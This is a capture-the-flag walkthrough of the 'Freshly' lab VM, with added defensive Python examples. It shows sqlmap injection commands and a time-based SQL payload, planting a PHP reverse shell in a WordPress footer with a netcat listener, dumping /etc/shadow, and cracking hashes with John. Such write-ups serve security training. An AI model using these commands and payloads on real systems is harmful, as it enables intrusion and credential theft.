piyr9

A Curious Mind with a Craving for Information to Life's many Problems.

Overview

Getting Started with the Freshly CTF: Scanning the Perimeter

Scanning the Freshly VM with nmap was quick and painless:

	root@fox-kali:~# nmap -sV -P0 -n -A 192.168.76.0/24
	Nmap scan report for 192.168.76.101
	Host is up (0.00037s latency).
	Not shown: 997 closed ports
	PORT     STATE SERVICE  VERSION
	80/tcp   open  http     Apache httpd 2.4.7 ((Ubuntu))
	|_http-title: Site doesn't have a title (text/html).
	443/tcp  open  ssl/http Apache httpd
	|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
	|_http-title: Site doesn't have a title (text/html).
	| ssl-cert: Subject: commonName=www.example.com
	| Not valid before: 2015-02-17T03:30:05+00:00
	|_Not valid after:  2025-02-14T03:30:05+00:00
	|_ssl-date: 1978-01-27T11:57:48+00:00; -37y79d8h25m34s from local time.
	8080/tcp open  http     Apache httpd
	|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
	|_http-title: Site doesn't have a title (text/html).
	MAC Address: 08:00:27:F2:73:82 (Cadmus Computer Systems)
	Device type: general purpose
	Running: Linux 3.X
	OS CPE: cpe:/o:linux:linux_kernel:3
	OS details: Linux 3.11 - 3.14
	Network Distance: 1 hop

	TRACEROUTE
	HOP RTT     ADDRESS
	1   0.37 ms 192.168.76.101

Recon Phase

We point our browser at the Apache web server on 192.168.76.101:80 and are shown a single image. After a nice chuckle, we move on, as the page source contains nothing worth mentioning.

Next, let's go to https://192.168.76.101:443 and accept the invalid site certificate. Hmm, okay: it is just a simple redirection to the page on 192.168.76.101:8080.

Clicking on the link gives us this WordPress site. There are some WordPress exploits we could use, but let's explore the rest of the machine first.

Checking for Vulnerabilities

Next I launched Nikto and OWASP ZAP against port 80 to see if there was something obvious to exploit. OWASP ZAP didn't show anything interesting, but Nikto had some output worth a closer look:

	root@fox-kali:~# nikto -h 192.168.76.101
	- Nikto v2.1.6
	---------------------------------------------------------------------------
	+ Target IP:          192.168.76.101
	+ Target Hostname:    192.168.76.101
	+ Target Port:        80
	+ Start Time:         2015-04-16 16:33:26 (GMT-4)
	---------------------------------------------------------------------------
	+ Server: Apache/2.4.7 (Ubuntu)
	+ Server leaks inodes via ETags, header found with file /, fields: 0x2f 0x50f4228b8016c 
	+ The anti-clickjacking X-Frame-Options header is not present.
	+ No CGI Directories found (use '-C all' to force check all possible dirs)
	+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST 
	+ Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.5
	+ Uncommon header 'x-webkit-csp' found, with contents: default-src 'self' ;script-src 'self'  'unsafe-inline' 'unsafe-eval';style-src 'self' 'unsafe-inline';img-src 'self' data:  *.tile.openstreetmap.org *.tile.opencyclemap.org;
	+ Uncommon header 'x-ob_mode' found, with contents: 0
	+ Uncommon header 'x-content-security-policy' found, with contents: default-src 'self' ;options inline-script eval-script;img-src 'self' data:  *.tile.openstreetmap.org *.tile.opencyclemap.org;
	+ OSVDB-3233: /icons/README: Apache default file found.
	+ /login.php: Admin login page/section found.
	+ /phpmyadmin/: phpMyAdmin directory found
	+ 6744 requests: 0 error(s) and 10 item(s) reported on remote host
	+ End Time:           2015-04-16 16:33:43 (GMT-4) (17 seconds)
	---------------------------------------------------------------------------
	+ 1 host(s) tested

Here we can see there is a login.php as well as a phpmyadmin directory. Let's check out http://192.168.76.101/login.php
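Nikto's findings above translate directly into checks a defender can run against the server's own response headers. The following Python is an added example, not part of the original write-up: the values in SAMPLE_HEADERS are constructed to mirror the scan output rather than captured from the target, and HARDENED_HEADERS is an assumed corrected configuration.

```python
import re

# Constructed response headers mirroring the nikto findings above (not a capture).
SAMPLE_HEADERS = {
    "Server": "Apache/2.4.7 (Ubuntu)",
    "X-Powered-By": "PHP/5.5.9-1ubuntu4.5",
    "ETag": '"2f-50f4228b8016c"',
    "X-WebKit-CSP": "default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval'",
    "Content-Type": "text/html",
}

# Assumed hardened configuration for the same server (constructed).
HARDENED_HEADERS = {
    "Server": "Apache",
    "X-Frame-Options": "DENY",
    "Content-Security-Policy": "default-src 'self'; script-src 'self'",
    "Content-Type": "text/html",
}

# Standard CSP header plus the two legacy names nikto reported.
CSP_NAMES = ("content-security-policy", "x-content-security-policy", "x-webkit-csp")


def audit_headers(headers):
    """Return a list of finding strings for one HTTP response's header map."""
    h = {k.lower(): v for k, v in headers.items()}
    findings = []

    # Clickjacking: neither X-Frame-Options nor a CSP frame-ancestors directive.
    csp_values = [h[n] for n in CSP_NAMES if n in h]
    if "x-frame-options" not in h and not any("frame-ancestors" in v for v in csp_values):
        findings.append("no X-Frame-Options or CSP frame-ancestors: page can be framed")

    # Version strings in Server / X-Powered-By tell an attacker exactly what to look up.
    for name in ("server", "x-powered-by"):
        if re.search(r"\d+\.\d+", h.get(name, "")):
            findings.append(f"{name} discloses a version: {h[name]}")

    # A CSP that allows inline or eval'd script gives little XSS protection,
    # and the X-* legacy names are ignored by current browsers anyway.
    for name in CSP_NAMES:
        if name not in h:
            continue
        if name != "content-security-policy":
            findings.append(f"{name} is a legacy CSP header ignored by current browsers")
        if "'unsafe-inline'" in h[name] or "'unsafe-eval'" in h[name]:
            findings.append(f"{name} permits unsafe-inline/unsafe-eval script")

    # Apache's FileETag can include the inode number; a multi-field hex ETag
    # should be checked against the FileETag directive in the vhost config.
    etag = h.get("etag", "").strip('"W/')
    if re.fullmatch(r"[0-9a-f]+(-[0-9a-f]+){1,2}", etag):
        findings.append("ETag is in Apache FileETag format; verify INode is not included")
    return findings
```

Running `audit_headers` over the two maps reproduces the six points Nikto raised for the scanned server and none for the hardened set; the same function can be pointed at live responses from `requests` or `urllib` once the header dict is extracted.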

This screams SQLi to me, but I had no luck with manual injections such as ' or '1' = '1' #, so out comes sqlmap.

SQL Injection via sqlmap

	root@fox-kali:~# sqlmap -u "http://192.168.76.101/login.php" --dbms=MySQL --dump --data "username=admin&password=pass&s=Submit" --level=9 --risk=9
	POST parameter 'password' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
	sqlmap identified the following injection points with a total of 11916 HTTP(s) requests:
	---
	Place: POST
	Parameter: password
	    Type: AND/OR time-based blind
	    Title: MySQL > 5.0.11 AND time-based blind
	    Payload: username=admin&password=pass'||(SELECT 'PJDY' FROM DUAL WHERE 5537=5537 AND SLEEP(5) )||'&s=Submit
	---
	[17:05:30] [INFO] the back-end DBMS is MySQL
	web server operating system: Linux Ubuntu
	web application technology: Apache 2.4.7, PHP 5.5.9
	back-end DBMS: MySQL 5.0.11
	[17:05:30] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
	[17:05:30] [INFO] fetching current database
	[17:05:30] [INFO] retrieved: 
	[17:05:30] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors 
	do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
	[17:06:05] [INFO] adjusting time delay to 1 second due to good response times
	login
	[17:06:44] [INFO] fetching tables for database: 'login'
	[17:06:44] [INFO] fetching number of tables for database 'login'
	[17:06:44] [INFO] retrieved: 2
	[17:06:48] [INFO] retrieved: user_name
	[17:07:57] [INFO] retrieved: users
	[17:08:13] [INFO] fetching columns for table 'user_name' in database 'login'
	[17:08:13] [INFO] retrieved: 1
	[17:08:15] [INFO] retrieved: user_name
	[17:09:24] [INFO] fetching entries for table 'user_name' in database 'login'
	[17:09:24] [INFO] fetching number of entries for table 'user_name' in database 'login'
	[17:09:24] [INFO] retrieved: 1
	[17:09:26] [INFO] retrieved: candyshop
	[17:10:43] [INFO] analyzing table dump for possible password hashes
	Database: login
	Table: user_name
	[1 entry]
	+-----------+
	| user_name |
	+-----------+
	| candyshop |
	+-----------+

	[17:10:43] [INFO] table 'login.user_name' dumped to CSV file '/usr/share/sqlmap/output/192.168.76.101/dump/login/user_name.csv'
	[17:10:43] [INFO] fetching columns for table 'users' in database 'login'
	[17:10:43] [INFO] retrieved: 2
	[17:10:47] [INFO] retrieved: user_name
	[17:11:56] [INFO] retrieved: password
	[17:13:05] [INFO] fetching entries for table 'users' in database 'login'
	[17:13:05] [INFO] fetching number of entries for table 'users' in database 'login'
	[17:13:05] [INFO] retrieved: 2
	[17:13:09] [INFO] retrieved: password
	[17:14:18] [INFO] retrieved: candyshop
	[17:15:35] [INFO] retrieved: PopRocks
	[17:16:45] [INFO] retrieved: Sir
	[17:17:06] [INFO] analyzing table dump for possible password hashes
	Database: login
	Table: users
	[2 entries]
	+----------+-----------+
	| password | user_name |
	+----------+-----------+
	| password | candyshop |
	| PopRocks | Sir       |
	+----------+-----------+

	[17:17:06] [INFO] table 'login.users' dumped to CSV file '/usr/share/sqlmap/output/192.168.76.101/dump/login/users.csv'
	[17:17:06] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/192.168.76.101'

	[*] shutting down at 17:17:06

Okay, some user passwords; those might help, but let's keep going and see if there are more databases to explore.
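The dump above exposes two separate defects in login.php: the password parameter is injectable, and the users table stores passwords in plaintext. The Python below is an added example, not code from the original page or from the Freshly VM. It uses an in-memory SQLite database with constructed rows as a stand-in for the MySQL login database, and places the string-built query beside a parameterised lookup that compares salted PBKDF2 hashes. The `x' OR '1'='1` payload is a constructed, SQLite-compatible variant of the tautology the author tried by hand (MySQL's `#` comment is not SQLite syntax).

```python
import hashlib
import hmac
import os
import sqlite3


def hash_password(password, salt):
    """Salted PBKDF2-HMAC-SHA256; the database never sees the plaintext."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


def make_db():
    """In-memory stand-in for the MySQL 'login' database (constructed data)."""
    db = sqlite3.connect(":memory:")
    # Schema as sqlmap dumped it: plaintext passwords.
    db.execute("CREATE TABLE users (user_name TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("candyshop", "password"), ("Sir", "PopRocks")])
    # Hardened schema: per-user salt and hash, no plaintext column at all.
    db.execute("CREATE TABLE users_v2 (user_name TEXT PRIMARY KEY, salt BLOB, pw_hash BLOB)")
    for name, pw in [("candyshop", "password"), ("Sir", "PopRocks")]:
        salt = os.urandom(16)
        db.execute("INSERT INTO users_v2 VALUES (?, ?, ?)",
                   (name, salt, hash_password(pw, salt)))
    return db


def login_vulnerable(db, user_name, password):
    """Query assembled by string formatting: the pattern behind the login.php finding.
    User-supplied text becomes part of the SQL, so quotes change the query's logic."""
    sql = "SELECT 1 FROM users WHERE user_name='%s' AND password='%s'" % (user_name, password)
    return db.execute(sql).fetchone() is not None


def login_hardened(db, user_name, password):
    """Parameterised lookup; the password is never sent to the database at all.
    The hash comparison happens in application code, in constant time."""
    row = db.execute("SELECT salt, pw_hash FROM users_v2 WHERE user_name=?",
                     (user_name,)).fetchone()
    if row is None:
        return False
    salt, stored = row
    return hmac.compare_digest(hash_password(password, salt), stored)
```

With this layout a successful injection into `user_name` would at most return a stored hash row for the wrong user, and the hash comparison still fails; the sqlmap run above would also have yielded hashes to crack rather than passwords to reuse.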

	root@fox-kali:~# sqlmap -u "http://192.168.76.101/login.php" --dbms=MySQL --dump --data "user=1&password=1&s=Submit" --dbs
	
	available databases [7]:
	[*] information_schema
	[*] login
	[*] mysql
	[*] performance_schema
	[*] phpmyadmin
	[*] users
	[*] wordpress8080

It seems there are 7 databases on the server, and two of them stand out to me: phpmyadmin and wordpress8080. Let's check out the phpmyadmin database:

	Database: phpmyadmin
	Table: pma_column_info
	[5 entries]
	+----+---------+---------------+----------+------------+-------------+----------------+------------------------+
	| id | comment | db_name       | mimetype | table_name | column_name | transformation | transformation_options |
	+----+---------+---------------+----------+------------+-------------+----------------+------------------------+
	| 1  | <blank> | login         | <blank>  | user_name  | user_name   | _              | <blank>                |
	| 2  | <blank> | login         | <blank>  | users      | user_name   | _              | <blank>                |
	| 3  | <blank> | login         | <blank>  | users      | password    | _              | <blank>                |
	| 4  | <blank> | wordpress8080 | <blank>  | users      | username    | _              | <blank>                |
	| 5  | <blank> | wordpress8080 | <blank>  | users      | password    | _              | <blank>                |
	+----+---------+---------------+----------+------------+-------------+----------------+------------------------+

Okay, some data, but not particularly useful. Let's try the wordpress8080 database:

	root@fox-kali:~# sqlmap -u "http://192.168.76.101/login.php" --dbms=MySQL --dump --data "user=1&password=1&s=Submit" -D wordpress8080

	Database: wordpress8080
	Table: users
	[1 entry]
	+----------+---------------------+
	| username | password            |
	+----------+---------------------+
	| admin    | SuperSecretPassword |
	+----------+---------------------+

Bingo! The username and password for WordPress are shown. Let's go log in; by default the WordPress admin login page is wp-login.php, so we point the browser at http://192.168.76.101:8080/wordpress/wp-login.php

And... we are in. What we have here is the WordPress admin interface, and from here getting a foothold is a snap. We go into Appearance -> Editor and see all the theme templates on the right-hand side.

I know that footer.php runs every time any page on the WordPress site loads, so let's use it to inject our code.

On Kali Linux, let's look for a PHP reverse shell that would work for us:

	root@fox-kali:~# locate php|grep reverse
	/usr/share/beef-xss/modules/exploits/m0n0wall/php-reverse-shell.php
	/usr/share/laudanum/php/php-reverse-shell.php
	/usr/share/metasploit-framework/data/php/reverse_tcp.php
	/usr/share/metasploit-framework/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb
	/usr/share/metasploit-framework/modules/payloads/singles/php/meterpreter_reverse_tcp.rb
	/usr/share/metasploit-framework/modules/payloads/singles/php/reverse_perl.rb
	/usr/share/metasploit-framework/modules/payloads/singles/php/reverse_php.rb
	/usr/share/metasploit-framework/modules/payloads/stagers/php/reverse_tcp.rb
	/usr/share/webshells/php/php-reverse-shell.php

Next, copy the contents of /usr/share/webshells/php/php-reverse-shell.php into the footer code, making sure to modify the IP address and port in the script so they point to our Kali machine:

	$ip = '192.168.76.102';  // CHANGE THIS
	$port = 591;       // CHANGE THIS

Reverse Shell

Click Update, then on our Kali machine start a netcat listener and refresh the WordPress site:

	root@fox-kali:~# nc -lvp 591
	listening on [any] 591 ...
	192.168.76.101: inverse host lookup failed: Unknown server error : Connection timed out
	connect to [192.168.76.102] from (UNKNOWN) [192.168.76.101] 44319
	Linux Freshly 3.13.0-45-generic #74-Ubuntu SMP Tue Jan 13 19:37:48 UTC 2015 i686 i686 i686 GNU/Linux
	 14:34:28 up 22:22,  0 users,  load average: 0.08, 0.23, 0.24
	USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
	uid=1(daemon) gid=1(daemon) groups=1(daemon)
	/bin/sh: 0: can't access tty; job control turned off
	$ whoami
	daemon
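Editing footer.php through the theme editor leaves exactly the kind of trace a file-integrity check catches: one known theme file changes its hash, and the new content calls functions a theme never needs. The following Python is an added example rather than anything from the original post. It hashes a constructed theme directory, compares it against a baseline manifest after a simulated footer.php edit, and flags changed files that contain a suspect marker. The directory layout, file contents and marker list are assumptions.

```python
import hashlib
import tempfile
from pathlib import Path


def hash_tree(root):
    """Map each file under root (relative path) to its SHA-256 hex digest."""
    root = Path(root)
    return {
        str(p.relative_to(root)): hashlib.sha256(p.read_bytes()).hexdigest()
        for p in sorted(root.rglob("*")) if p.is_file()
    }


def diff_manifests(baseline, current):
    """Return (added, removed, modified) relative paths between two manifests."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(p for p in baseline.keys() & current.keys()
                      if baseline[p] != current[p])
    return added, removed, modified


# Calls a theme template has no business making; assumed list, extend as needed.
SUSPECT_MARKERS = (b"fsockopen(", b"proc_open(", b"shell_exec(", b"base64_decode(")


def flag_suspect(root, paths):
    """Among the given changed paths, return those containing a suspect marker."""
    hits = []
    for rel in paths:
        data = (Path(root) / rel).read_bytes()
        if any(marker in data for marker in SUSPECT_MARKERS):
            hits.append(rel)
    return hits


def demo():
    """Constructed theme tree: take a baseline, then simulate the footer.php edit above."""
    with tempfile.TemporaryDirectory() as tmp:
        theme = Path(tmp) / "twentyfifteen"
        theme.mkdir()
        (theme / "footer.php").write_text("<?php wp_footer(); ?>\n")
        (theme / "header.php").write_text("<?php wp_head(); ?>\n")
        baseline = hash_tree(theme)

        # Simulated tampering (constructed): a connect-back stub prepended to the
        # footer, and a stray file dropped next to it.
        (theme / "footer.php").write_text(
            "<?php $sock = fsockopen($ip, $port); wp_footer(); ?>\n")
        (theme / "wp-tmp.php").write_text("<?php echo 'x'; ?>\n")

        added, removed, modified = diff_manifests(baseline, hash_tree(theme))
        return added, removed, modified, flag_suspect(theme, added + modified)
```

In a real deployment the baseline manifest is stored off the web server and the comparison runs from cron or a monitoring agent; the hash check alone catches the edit, and the marker scan is only a triage aid. WordPress can also remove the Appearance -> Editor path used above entirely by setting `define('DISALLOW_FILE_EDIT', true);` in wp-config.php.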

Okay, that was straightforward. Now that we are in, let's explore:

	$ cat /etc/passwd
	root:x:0:0:root:/root:/bin/bash
	daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
	bin:x:2:2:bin:/bin:/usr/sbin/nologin
	sys:x:3:3:sys:/dev:/usr/sbin/nologin
	sync:x:4:65534:sync:/bin:/bin/sync
	games:x:5:60:games:/usr/games:/usr/sbin/nologin
	man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
	lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
	mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
	news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
	uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
	proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
	www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
	backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
	list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
	irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
	gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
	nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
	libuuid:x:100:101::/var/lib/libuuid:
	syslog:x:101:104::/home/syslog:/bin/false
	messagebus:x:102:105::/var/run/dbus:/bin/false
	user:x:1000:1000:user,,,:/home/user:/bin/bash
	mysql:x:103:111:MySQL Server,,,:/nonexistent:/bin/false
	candycane:x:1001:1001::/home/candycane:
	# YOU STOLE MY SECRET FILE!
	# SECRET = "NOBODY EVER GOES IN, AND NOBODY EVER COMES OUT!"

	$ cat /etc/shadow
	root:$6$If.Y9A3d$L1/qOTmhdbImaWb40Wit6A/wP5tY5Ia0LB9HvZvl1xAGFKGP5hm9aqwvFtDIRKJaWkN8cuqF6wMvjl1gxtoR7/:16483:0:99999:7:::
	daemon:*:16483:0:99999:7:::
	bin:*:16483:0:99999:7:::
	sys:*:16483:0:99999:7:::
	sync:*:16483:0:99999:7:::
	games:*:16483:0:99999:7:::
	man:*:16483:0:99999:7:::
	lp:*:16483:0:99999:7:::
	mail:*:16483:0:99999:7:::
	news:*:16483:0:99999:7:::
	uucp:*:16483:0:99999:7:::
	proxy:*:16483:0:99999:7:::
	www-data:*:16483:0:99999:7:::
	backup:*:16483:0:99999:7:::
	list:*:16483:0:99999:7:::
	irc:*:16483:0:99999:7:::
	gnats:*:16483:0:99999:7:::
	nobody:*:16483:0:99999:7:::
	libuuid:!:16483:0:99999:7:::
	syslog:*:16483:0:99999:7:::
	messagebus:*:16483:0:99999:7:::
	user:$6$MuqQZq4i$t/lNztnPTqUCvKeO/vvHd9nVe3yRoES5fEguxxHnOf3jR/zUl0SFs825OM4MuCWlV7H/k2QCKiZ3zso.31Kk31:16483:0:99999:7:::
	mysql:!:16483:0:99999:7:::
	candycane:$6$gfTgfe6A$pAMHjwh3aQV1lFXtuNDZVYyEqxLWd957MSFvPiPaP5ioh7tPOwK2TxsexorYiB0zTiQWaaBxwOCTRCIVykhRa/:16483:0:99999:7:::
	# YOU STOLE MY PASSWORD FILE!
	# SECRET = "NOBODY EVER GOES IN, AND NOBODY EVER COMES OUT!"

Ok, it seems I caught the flag, but I'm still not satisfied until I get root, so let's launch John the Ripper against the shadow hashes (saved to /tmp/fresh):

	root@fox-kali:~# john --wordlist=/root/rockyou.txt /tmp/fresh 
	Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt"
	Use the "--format=crypt" option to force loading these as that type instead
	Loaded 3 password hashes with 3 different salts (sha512crypt [64/64])
	password         (candycane)

John is still running in the background; while it does, let's look for a different attack vector to escalate our privileges. Stay tuned...

Update: I have been told that this VM was not designed to be rootable, so the walkthrough stops here.

Other thoughts: It might have been rootable if the gcc compiler were installed on this Ubuntu machine. On that note, piyr9 signing off until the next VM.